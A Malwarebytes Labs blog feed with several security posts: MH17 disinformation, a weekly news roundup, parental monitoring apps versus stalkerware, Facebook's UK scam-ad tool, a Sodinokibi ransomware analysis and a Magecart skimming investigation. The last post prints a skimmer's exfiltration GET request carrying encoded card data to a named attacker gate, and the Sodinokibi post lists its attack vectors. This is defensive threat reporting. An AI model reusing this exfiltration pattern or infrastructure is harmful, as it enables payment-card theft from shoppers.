Techie Feeds

Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach

Malwarebytes - Tue, 07/23/2019 - 15:54

A little background: on July 17, 2014, Malaysia Airlines Flight 17 was shot from the sky on its way from Amsterdam to Kuala Lumpur above the Ukraine. The plane was hit by a surface-to-air missile, and as a result, all 298 people on board were killed.

At that time, there was a revolt of pro-Russian militants against the Ukrainian government. Both the Ukrainian military and the separatists denied responsibility for the incident. After investigation of the crash site and reconstruction of the plane wreck, it was determined that the missile was fired from a BUK air defense missile system.

The BUK systems originated from the former Soviet Union but are in use by several countries. Three military presences in the region possessed the weaponry identified as behind the damage. (There were also Russian forces in the region as “advisors” for the separatists.) For this reason, it was difficult to investigate who was responsible for the attack.

Here’s where cybersecurity comes into play. Social media and leaked data played an important role in this investigation. And they also play an important role in the propaganda that the Russians used, and are continuing to use, to invalidate the methods and results of the investigation.

By following the cybersecurity breadcrumbs, we can determine which information released online is legitimate and which is a deliberate disinformation. However, most casual readers don’t go that far—or can’t—as they don’t have the technical capability to validate information sources.

How can they (we) sort out fiction from fact? Here’s what we know about the investigation into MH17, Russian disinformation, and which countermeasures can be put in place to fight online propaganda.

The investigation

On June 19, 2019, the Joint Investigation Team (JIT) that was set up to investigate this incident issued warrants for four individuals that they hold responsible: They are three Ukrainian nationals and one Russian national. They were not the crew of the BUK missile launcher, but the men believed to be behind the transport and deployment of the Russian BUK missile launcher.

The Netherlands had already held Russia responsible at an earlier stage of the investigation because they found sufficient information to show that the BUK launcher originated from Russia and was manned by Russian soldiers. Both the Ukraine and Russia have laws against extradition of their nationals, so the chances of hearing from the suspects are slim-to-none. So how can we learn exactly what happened?

Finding information

Immediately after the incident, the JIT started to save 350 million webpages with information about the region where the incident took place. These pages were saved because otherwise important information could be lost or removed. By using photos and videos that were posted on social media, they were able to track back the route that the BUK system took to reach the place from which the fatal missile was launched.

Dashcams are immensely popular in Russia and surrounding countries, because they provide evidence in insurance claims. So there was a lot of material available to work with. And the multitude of independent sources made it hard to contradict the conclusions. Also, part the route could be confirmed by using satellite images made by Digital Globe for Google Earth.

By using VKontakte (a Russian social media platform much like Facebook), a Bellingcat researcher was able to reconstruct the crew that manned the BUK system at the time of the incident. And the Ukrainian secret security service (SBU) gladly provided wiretaps of pro-Russian separatists “ordering” a BUK system and coordinating the transport to the Ukraine. Bellingcat was even able to retrieve a traffic violation record confirming the location of one of the vehicles accompanying the BUK system.

Because Bellingcat is a private organization, it has fewer rules and regulations to follow as the official investigation team (JIT), which gives them an edge when it comes to using certain sources of information. If you are interested in the information they found and especially how they found it, you really should read their full report.

If nothing else, it shows how a determined group of people can use all the little pieces of information you leave behind online to draw a pretty comprehensive picture. In fact, researchers have reasons to believe that Bellingcat was stirring up enough dirt to become the target of a spear-phishing attack attributed to the Russian group Fancy Bear APT.

These attacks are suspected to have been attempts to take over Bellingcat accounts enabling the Russians to create even more confusion. The Dutch team that investigated the incident scene reported phishing and hacking attempts as well.

Creating disinformation

Russia has a special department of disinformation called the Internet Research Agency (IRA) which headquarters in St.Petersburg. They started an orchestrated campaign to put the blame for the incident with the Ukrainian military.

While the IRA would love to influence international opinion about what happened to MH17, there’s way too information (aka facts) out there that would prove them wrong. Instead, they are focusing on their domestic audience to influence the country’s own public opinion. Knowing that their government shot down a commercial airliner would not go down well. So, blogs were written that blamed the Ukrainian military and many thousands of fake accounts started pointing to those blogs. In the first two days after the disaster alone, this amounted to 66,000 Tweets. 

Every time the JIT issued new information about their findings, the IRA started a new campaign with “alternative” information. This prolonged campaign and the sheer mass of disinformation did have one advantage. The platforms that the IRA used were able to gather a lot of information about the operation and link the social media accounts that were involved.

In 2018, Twitter issued an update mentioning the IRA as they removed almost 4,000 Russian accounts believed to be associated with the group, which amassed:

10 million Tweets and 2 million images, GIFs, videos, and Periscope broadcasts

Twitter certainly wasn’t the only platform the IRA used to spread disinformation, but it’s the only platform that disclosed their information about the “fake news factory.” You can find the same disinformation posted on Facebook, VKontakte, and in the comments sections of many websites.

Their goal is simple. When the public reads 20 different stories about the same news item, they no longer know which one to believe. An interesting version promoted by the IRA was that the BUK missile must have been intended for a plane that Russian president Putin was traveling in and which had presumably passed shortly before the incident. It’s easy to track down information proving that this wasn’t true, but most readers won’t go that far.

Yet another conspiracy theory linked the Ukrainian military with Western governments. Russia has a long history of conspiracy theories that are used both to entertain the audience and to lead them away from reality.

Countermeasures against disinformation

Since 2016, the US has become aware of Russian interference in online information, communications, and even elections—but we haven’t found a surefire fix for fake news. Europe caught on a bit earlier, but in the interest of undermining democracies, a simple piece of disinformation can unravel hundreds of years of progress.

Before the United States figured out how to respond and while Europe was cautiously evaluating the online landscape, their adversaries were able to evolve and advance their disinformation techniques. Russia is not alone: there are other nations that would like to see democratic societies upended. Iran, North Korea, and China are learning from the Russians how to play the game of disinformation.

Obvious methods to counter the possible influence of disinformation are education, finding trusted sources, and transparency. But even in a democracy, these are not always the first resort for those in powerful positions.

Education empowers people to make up their own mind based on gathered information. Transparency gives them the tools to make decisions based on facts and not fiction. And finding trusted sources means first digging deep into their backgrounds, learning whether their methods of reporting are honorable, and establishing a consistent pattern of truth-telling.

You can ask yourself whether it is a good strategy to rely on the self-moderation that has been imposed on social media platform, but at the moment this is our first line of defense. US Congress has prepared legislation that would increase ad transparency, govern data use, and establish an interagency fusion cell to coordinate government responses against disinformation, but these are all laws waiting to be passed for now.

Unlimited research

Another question that is reflexively brought up by this matter is how we can increase the effectiveness of official investigators like JIT to the level of Bellingcat without giving them a free pass to hack their way into every imaginable system.

An official international “police force” might be needed to conduct investigations for the international courts that already are in place, with warrants to demand information from any source that might have it. However, this doesn’t work when suspects, such as those in the MH17 investigation, are protected from the law if they stay in their own country.

We know the courts and investigators should be provided with more adequate ways to gather evidence, but this is no easy matter to solve without jeopardizing the very free will we are trying to protect. It will require a lot of diplomacy and negotiation if we ever want to achieve this.

A little warning

Since the interest in this incident has risen again after the official disclosure of some of the main suspects, we may see a revival of MH17-related phishing campaigns. Previous campaigns pretended to be memorial sites for the victims but lead victims to fake sites that seduced visitors to allow push notifications or to download video players infected with PUPs or malware.

Stay on the lookout, as cybercriminals—whether of Russian origin or not—are always looking to capitalize on tantalizing news stories or moments of public confusion.

And when in doubt, the best advice we can give is to be cautious when exploring the Internet and view any information you read through the lens of caution. Find your trusted sources, educate yourself, and look for those who are transparent.

Stay safe, everyone!

The post Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 15 – 21)

Malwarebytes - Mon, 07/22/2019 - 15:50

Last week on Malwarebytes Labs, we took an extensive look at Sodinokibi, one of the new ransomware strains found in the wild that many believe picked up where GandCrab left off. We also profiled Extenbro, a Trojan that protects adware; reported on the UK’s new Facebook reporting tool, homed in on new Magecart strategies that render them ‘”bulletproof;” identified challenges faced by the education sector in the age of cybersecurity; and looked at how older generations keep up with the fast-paced evolution of tech.

Other cybersecurity news:
  • An exploit called Media File Jacking gives hackers access to the personal media files of WhatsApp and Telegram users, allowing for the interception, misuse, or manipulation of files. (Source: Venture Beat)
  • Remember the Zoom webcam vulnerability? RingCentral and Zhumu, two other video conferencing software programs, are also affected by the same flaw. (Source: BuzzFeed News)
  • A bug in Instagram that allows someone to bypass 2FA to hack any account was made public. Facebook quickly fixed the issue. (Source: Threatpost)
  • Sodinokibi isn’t the only ransomware borne from older ransomware. DoppelPaymer emerged from BitPaymer, too. (Source: Bleeping Computer)
  • Schools continue to be vulnerable on the cybersecurity side. And while ransomware is their current big problem, DDoS attacks are the second. (Source: The Washington Post)
  • FaceApp has been in hot water these past few days due to its connection with Russia. The company broke its silence and denied storing users’ photographs without permission. (Source: The Guardian)
  • EvilGnome, a new backdoor, was found to target and spy on Linux users. (Source: Bleeping Computer)
  • To prove a point, researchers made an Android app that targets insulin pumps, either to withhold or give lethal dosages of insulin, threatening patient lives. (Source: WIRED)
  • Some browser extensions are found to have collected browsing histories of millions of users. This gigantic leaking is dubbed DataSpii, and Chrome and Firefox users are affected. (Source: Ars Technica)
  • Meet Ke3chang, an APT group that are out to get diplomatic missions. (Source: ESET’s We Live Security Blog)

Stay safe, everyone!

The post A week in security (July 15 – 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Parental monitoring apps: How do they differ from stalkerware?

Malwarebytes - Mon, 07/22/2019 - 15:00

In late June, Malwarebytes revived its long-running campaign against a vicious type of malware in use today. This malware peers into text messages. It pinpoints victims’ movements across locations. It reveals browsing and search history. Often hidden from users, it removes their expectation of, right to, and real-world privacy.

But after we recommitted our staunch opposition to this type of malware—called stalkerware—we received questions about something else: Parental monitoring apps.

The capabilities between the two often overlap.

TeenSafe, which retooled its product to focus on safe driving, previously let parents read their children’s text messages. Qustodio, recommended by the Wirecutter for parents who want to limit their children’s device usage, lets parents track their kids’ locations. Kidguard, clearly named and advertised as a child safety app, lets parents view their children’s browsing and search history.

Quickly, the line becomes blurred. What are the differences between stalkerware apps and parental monitoring apps? What is an “acceptable” or “safe” parental monitoring app? And how can a parent know whether they’re downloading a “legitimate” parental monitoring app instead of a stalkerware app merely disguised as a tool for parents?

Malwarebytes Labs is not here to tell people how to parent their children. We are here to investigate, report, and inform.

Knowing what we do about parental monitoring apps—their capabilities, their cybersecurity vulnerabilities, and their privacy implications—our safest recommendation is to avoid these apps.

However, we understand the digital challenges facing parents today. Cyber bullying remains a constant concern, violent images and videos profligate online, and extremist content lingers across multiple platforms.

Diana Freed, a PhD student at the Intimate Partner Violence tech research lab led by Cornell Tech faculty, said she understands the appeal of these tools for parents. They advertise safety, she said.

“I believe that when parents are putting these apps on someone’s phone, they’re trying to do it to make their child safer,” Freed said. “They’re not saying ‘I don’t want my child to not have privacy.’ They think they’re doing the best they can to make this a safer place for their child.”

However, Freed explained, there is a lot to these apps that parents should know.

“Let’s assume that everyone is a good actor and wants to do the right thing,” Freed said. “But it is a matter of, is it clear to that parent what these apps are doing?”

What’s the difference?

Multiple privacy advocates and cybersecurity researchers said that, when comparing the technical capabilities of parental monitoring apps to those of stalkerware apps, the light that shines between the two is dim, if not entirely absent.

“Is there a line between legitimate monitoring apps and stalkerware apps?” said Cynthia Khoo, author of the CitizenLab report on stalkerware “Predator in Your Pocket.”

She answered her own question:

“On a technological level, no. There is no differentiation.”

Khoo explained that, when working with her co-authors on the Predator in Your Pocket paper, the team initially struggled with how to address monitoring applications that advertise themselves in benign, non-predatory ways, yet provide users with reams of sensitive information. It is the famous “dual-use” problem with stalkerware: some apps, though not advertised or designed for invasive monitoring, still provide the same capabilities.

That struggle disappeared though, Khoo said, when the team realized that apps could be evaluated by their capabilities, and whether those capabilities could violate the laws of Canada, where CitizenLab is located.

“We realized that if an app is not just providing location monitoring, if it’s collecting information from social media accounts, the private contents of someone’s phone—in Canadian law, that could be seen as unlawful interception of someone’s phone, unauthorized access to someone’s computer,” Khoo said. “Regardless of branding or marketing, that’s a criminal offense.”

Emory Roane, policy counsel at Privacy Rights Clearinghouse, said that, not only are the technical capabilities of stalkerware apps and parental monitoring apps highly similar, the capabilities themselves can be found within the type of hacking tools used by nation states.

“If you look at the capabilities: What results can be gathered from devices implanted with stalkerware versus devices hacked by nation states? It’s the same,” Roane said. “Turning on and off the device remotely, key loggers, tracking via GPS, all of this stuff.”

Roane continued: “We have to be very careful about the use of these by parents.”

Both Roane and Khoo also warned about the lack of consent allowed by many of these apps. Some stalkerware apps, like mSpy, FlexiSPY, and Hoverwatch, can operate entirely hidden from view, absent from a device’s app drawer.

Some parental monitoring apps offer the exact same feature.

Particularly concerning, we found that the app Kidguard actually reviewed the stalkerware app mSpy on its own website. In the list of pros and cons for mSpy, Kidguard listed the following as a positive:

“Operates 100% invisibly, cannot be detected.”

This invisible capability is a clear warning sign about any monitoring app, Khoo said.

“There is no legitimate reason or need to hide surveillance if it is truly for a genuine, good faith, legal, legitimate purpose,” Khoo said. “If you have the person’s consent, you don’t need to hide. If you don’t have consent, this shouldn’t be used in the first place.”

We agree.

Any monitoring app designed to hide itself from the end-user is designed against consent.

The cybersecurity risks

The cybersecurity reputations of several parental monitoring apps are questionable, as the companies behind them have left data—including photos and videos of children—vulnerable to threat actors and hackers.

In 2017, Cisco researchers disclosed multiple vulnerabilities for the network device “Circle with Disney,” a tool meant to monitor a child’s Internet usage. The researchers found that Circle with Disney had vulnerabilities that could have let a hacker “gain various levels of access and privilege, including the ability to alter network traffic, execute arbitrary remote code, inject commands, install unsigned firmware, accept a different certificate than intended, bypass authentication, escalate privileges, reboot the device, install a persistent backdoor, overwrite files, or even completely brick the device.”

In 2018, a UK-based cybersecurity researcher found two unsecured cloud servers operated by TeenSafe. Located on the servers were tens of thousands of accounts details—including parents’ email addresses and children’s Apple ID email addresses, along with their device names, unique identifiers, and plaintext passwords.

ZDNet, which covered the vulnerability, wrote:

“Because the app requires that two-factor authentication is turned off, a malicious actor viewing this data only needs to use the credentials to break into the child’s account to access their personal content data.”

Also in 2018, the parental monitoring company Family Orbit—which offers an app on iOS and Android—left open cloud storage servers that contained an eye-popping 281 gigabytes of sensitive data. The vulnerable servers, identified by an online hacker, contained photographs and videos of children.

These are just the cybersecurity flaws. This is nothing to mention the labyrinthine network of related third parties that could work with parental monitoring apps, receiving collected data and storing it across other, potentially unsecure servers littered across the web.

Steadily, the American public has begun to understand and push back on the many ways in which their data is shared with numerous third parties, often without their express, individualized consent. If it isn’t okay for adults, is it okay for children?

The privacy risks

Parental monitoring apps can give parents a near-omniscient, unfiltered view into their children’s lives, granting them access to text messages, shared photos, web browsing activity, locations visited, and call logs. Without getting consent from a child, these surveillance capabilities represent serious invasions of privacy.

Privacy Rights Clearinghouse’s Roane compared the clandestine use of these apps to a more familiar analogue:

“Would you support breaking into your child’s diary if this was the ’80s?” Roane said. “This is extremely sensitive information.”

Multiple studies have suggested that the relationship between parents and children can be significantly altered depending on the types of surveillance pushed onto them, with the age of a child playing a significant role. As a child grows older—and as their need for privacy ties closely into their autonomy—digital monitoring can potentially hinder their trust in their parents, their self-expression, and their mental health.

A few years ago, UNICEF published a discussion paper that warned of this very problem:

“The tension between parental controls and children’s right to privacy can best be viewed through the lens of children’s evolving capacities. While parental controls may be appropriate for young children who are less able to direct and moderate their behaviour online, such controls are more difficult to justify for adolescents wishing to explore issues like sexuality, politics, and religion.”

The paper also warned that strict parental controls could impair a child’s ability to “seek outside help or advice with problems at home.”

According to the science magazine Nautilus, a one-year study of junior high students in the Netherlands showed that students who were snooped on by their parents reported “more secretive behaviors, and their parents reported knowing less about the child’s activities, friends, and whereabouts, compared to other parents.”

Laurence Steinberg, a professor of psychology at Temple University, told Nautilus that when parents invade their children’s privacy, those children could be more at risk to suffer from depression, anxiety, and withdrawal. She told the outlet:

“There’s a lot of research indicating that kids who grow up with overly intrusive parents are more susceptible to those mental health problems, partly because they undermine the child’s confidence in their abilities to function independently.”

Further, in the 2012 report, “Surveillance Technologies and Children,” the Office of the Privacy Commissioner of Canada suggested that parents who rely on surveillance to keep their children safe risk stunting the maturity of those children.

Tonya Rooney, a researcher in child development and relationships at the Australian Catholic University, said in the report:  

“We need to question whether the technologies may be depriving children of the opportunity to develop confidence and competence in skills that would in turn leave them in a stronger position to assess and manage risks across a broad range of life experiences.” 

Unfortunately, this field of study is relatively new. As the children subject to parental monitoring apps reach adulthood, more can be measured, including whether those children will accept other forms of surveillance—like from domestic partners and governments.

If you’re looking for a pithy takeaway, maybe read Gizmodo’s article about a University of Central Florida study of teen monitoring apps: “Teen Monitoring Apps Don’t Work and Just Make Teens Hate Their Parents, Study Finds.”

Tough, necessary conversations

We understand that telling readers about the never-ending downsides of parental monitoring apps fails to address the likely reality that many parents have engaged in some type of digital monitoring in a safe, healthy, and openly-communicated way.

For those who have found safe passage, well done. For those who have not, the researchers we spoke to all agreed on one priority: If you absolutely insist on using one of these apps, you should discuss it with your children.

“You can openly say [to a child] ‘I am going to start looking at your location because we’re concerned and this is how we’re going to do it,’” said Freed of the IPV tech lab at Cornell. “In terms of the child’s privacy, have a conversation on the concerns and why you’re doing it, what the app you’re putting on their phone will do, what information you’ll know.”

Freed continued:

“Work through it together.”

Freed also suggested that parents could introduce only one type of digital monitoring at a time. For each additional capability—location tracking, social media monitoring, browser activity monitoring—Freed said parents should have a new conversation.

Parents that are curious about a parental monitoring app’s capabilities—including whether that app could violate privacy—should read the description available online through the App Store or the Google Play Store, said Sam Havron, another researcher and PhD student at the IPV tech lab.

“The best thing, or the closest thing, is to look at the developers’ descriptions on the marketplaces, look at the permission levels,” Havron said. He said parents could also download the app and try it out on a separate device before utilizing it on a child’s device.

Ellen Zavian, the parent of a 13-year-old boy and a member of the Tech and Safety Subcommittee for the Montgomery County Council of Parent-Teacher Associations in Maryland, suggested that parents look at the issue differently: Don’t focus so much on device software, focus on the device.

Instead of installing a screen-time-limiting app on a child’s device, or limiting what they see, or what apps they can use, remove the device entirely from the child’s room and don’t let them use it at night when they go to bed, Zavian said. Or maybe don’t let them own a device at all, which Zavian is pledging to do until her son starts eighth grade—a popular movement with parents called Wait Until 8th.

She also suggested only giving a child a Wi-Fi enabled device with no data plan, and then unplugging the home router to stop any Internet activity. Or parents could even prevent a child’s device from connecting to the home Internet, a setup that can be configured on most modern routers.

Zavian pressed on her point, making a comparison to another stressful moment in parenting—letting teenagers drive. She said there’s a difference between monitoring a teenager’s driving through apps and monitoring the teenager’s access to the car itself.

“When my friends were monitoring their kids with where they were driving to, my kids just wouldn’t have keys to the car,” Zavian said. “Why do you want to engage in that fight—you’ve got enough fights when they’re teenagers—where you say ‘I saw you went here,’ or ‘I saw you were speeding here.’”

Zavian suggested that parents remember there are always alternatives to using a parental monitoring app. In fact, those alternatives have existed for far longer, and she learned about them herself when learning to drive.

“Just like we did—you get into a car accident, you’re off the insurance,” Zavian said.

The post Parental monitoring apps: How do they differ from stalkerware? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Facebook ad reporting tool launches in UK

Malwarebytes - Fri, 07/19/2019 - 15:00

Last year, well-known consumer advice expert Martin Lewis decided to take Facebook to court for defamation. The cause? Multiple bogus adverts placed on the social network featuring his likeness, appearing via the ad network Outbrain.

As a trusted face in consumer causes, scammers bolting Lewis’ face onto rogue ads would always be a money spinner. This would, of course, have the knock-on effect of potentially damaging his reputation, especially with tales of victims losing as much as £100,000

By the time he’d seen around 50 advertisements promoting various Bitcoin scams, enough was enough—especially as he felt reporting the ads got him nowhere.

Making bogus ads for fun and profit

Regular readers will no doubt be familiar with these types of bogus ads hawking swiped images of trusted individuals. It’s essentially the same as we saw a while back on compromised profile pages, all promoting some wonderful new money-making scheme courtesy of Ellen. However you stack it up, people are out of pocket.

In Lewis’ case, some of the ads looked like they were from British newspapers, or other established news sources. Many offered up the usual social engineering tactic of a ticking timer: “Get this offer soon before it runs out!” Work-from-home riches, revolutionary opportunities, making huge amounts from “small” investments—every sleazy claim you could imagine were all present and accounted for, and they all were situated next to or above Lewis looking enthusiastic (and talking about something utterly unrelated).

Facebook banned crypto-themed ads, but these Lewis-themed efforts simply replaced pictures of Bitcoin with pictures of him and sent them to cryptocurrency sites elsewhere. The Lewis ads in question were centered on incredibly dubious binary trading scams.

What is binary trading?

It’s a risky form of fixed-odds betting. You either win or you lose. Win, and you get a bump in your coffers. Lose, and you lose everything. They’re not allowed in the EU, which means scammers set up shop outside its borders, claiming to have base of operations in places like London and Paris, and set to work with slick, convincing adverts. As the FCA advice notes, some scammers will even manipulate the numbers in front of potential victims before swiping all the cash and vanishing into the night.

So it is into this maelstrom of potentially damaged reputations, bogus adverts, and incredibly devastating fake Bitcoin scams that Lewis and Facebook went into battle. With what he felt was a lack of responsiveness over the course of a year, off he went to try and get something done about it.

Closing time for bad ads?

In January 2019, Lewis agreed to settle out of court. By this point, Facebook had admitted there’d been “thousands” of these ads across the site. The legal settlement relied on the conditions that Facebook would donate £3 million pounds to Citizen’s Advice to create a UK Scams Action Project, and they’d also launch a UK-centric scam ad reporting tool complete with dedicated team. The donation would take the form of £2.5 million in cash over two years, with the other £500,000 covering Facebook ads presumably promoting the new services.

We have lift-off

A little later than previously advertised, the wheels have finally turned and the promises listed above have turned into tangible reality. Not only is the Scams Action page live, the rogue ad report tool is also active in the UK. Reporting an ad takes a few steps, but is clearly an improvement on no tool at all. Reporting is a case of clicking the dots above any ad, and selecting the appropriate options before sending.

Click to enlarge

Click to enlarge

There’s never been a better time to start reporting bogus ads on Facebook. If you see something that looks suspicious, by all means file a report and do your bit to help keep the most vulnerable online away from potentially life-ruining scams.

The post New Facebook ad reporting tool launches in UK appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Malwarebytes - Thu, 07/18/2019 - 17:58

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid June and mid July. Based on our telemetry, Sodinokibi has been on rise since GandCrab’s exit at the end of May.

Business and consumer detection trends for Sodin/REvil from May 2019 until present

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief at GandCrab’s “passing,” some expressed skepticism over whether the team would truly put behind their successful money-making scheme. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

Enter Sodinokibi

Putting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers—”affiliates” in the case of RaaS operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi has been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8 Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en-masse. This is done by accessing networks via a remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding ransom note will have the file name r4nd01-readme.txt.

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in their attacks—but Sodinokibi is not your average ransomware. It takes advantage of an elevated privilege zero-day vulnerability in the Win32k component file in Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruitArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects premium consumer users and business users with signature-less detection, nipping the attack in the bud before the infection chain even begins. Users of our free version are not protected from this threat without real-time protection.

We recommend consumers take the following actions if they are not premium Malwarebytes customers:

  • Create secure backups of your data, either on an external drive or on the cloud. Be sure to detach your external drive from your computer once you’ve saved all your information, as it, too, could be infected if still connected.
  • Run updates on all your systems and software, patching for any vulnerabilities.
  • Be aware of suspicious emails, especially those that contain links or attachments. Read up on how to detect phishing attempts both on your computer and your mobile devices.

To mitigate on the business side, we also recommend IT administrators to do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel or employees who need access only.
  • Disable macro on Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.
Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Malwarebytes - Thu, 07/18/2019 - 15:00

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and trying to pass itself for Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to login into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider. It’s quite likely the threat actors may be taking advantage of it.

